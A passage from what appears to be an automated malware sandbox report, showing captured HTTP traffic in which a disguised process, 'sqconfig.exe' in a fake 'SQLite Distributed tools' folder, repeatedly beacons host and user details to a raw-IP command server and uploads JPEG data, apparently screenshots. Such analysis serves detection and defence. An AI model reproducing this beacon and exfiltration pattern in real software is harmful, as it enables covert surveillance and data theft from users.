                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:50.940135956 CEST7235INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  60192.168.2.34985591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:09.062335968 CEST10175OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:09.062427044 CEST10175OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:09.062596083 CEST10185OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:09.062674046 CEST10188OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:09.190107107 CEST10192OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:09.190608025 CEST10208OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:09.190661907 CEST10214OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:09.318173885 CEST10220OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:09.318681002 CEST10228OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:09.318718910 CEST10241OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:53:09.318742037 CEST10249OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:09.534909010 CEST10265INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  61192.168.2.34985791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:09.508666039 CEST10264OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:09.716198921 CEST10266INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  62192.168.2.34985991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:09.854418993 CEST10267OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:09.854599953 CEST10267OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:09.854768991 CEST10277OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:09.854892015 CEST10280OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:09.974612951 CEST10287OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:09.974658012 CEST10290OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:09.975133896 CEST10305OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:09.975200891 CEST10307OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:10.095500946 CEST10310OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:10.095614910 CEST10318OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:10.095937967 CEST10321OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:10.289503098 CEST10361INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  63192.168.2.34986091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:09.967240095 CEST10282OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:10.177187920 CEST10359INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  64192.168.2.34986891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:10.424632072 CEST10381OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:10.652374029 CEST10402INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  65192.168.2.34986991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:10.623368979 CEST10388OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:10.623437881 CEST10389OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:10.623610973 CEST10399OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:10.623704910 CEST10401OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:10.750722885 CEST10414OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:10.751008987 CEST10426OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:10.751086950 CEST10431OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:10.878314018 CEST10813OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:10.878422976 CEST10822OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:10.878479958 CEST10827OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:10.878498077 CEST10830OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:53:11.104340076 CEST12839INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  66192.168.2.34987191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:10.898562908 CEST11038OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:11.118099928 CEST13101INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
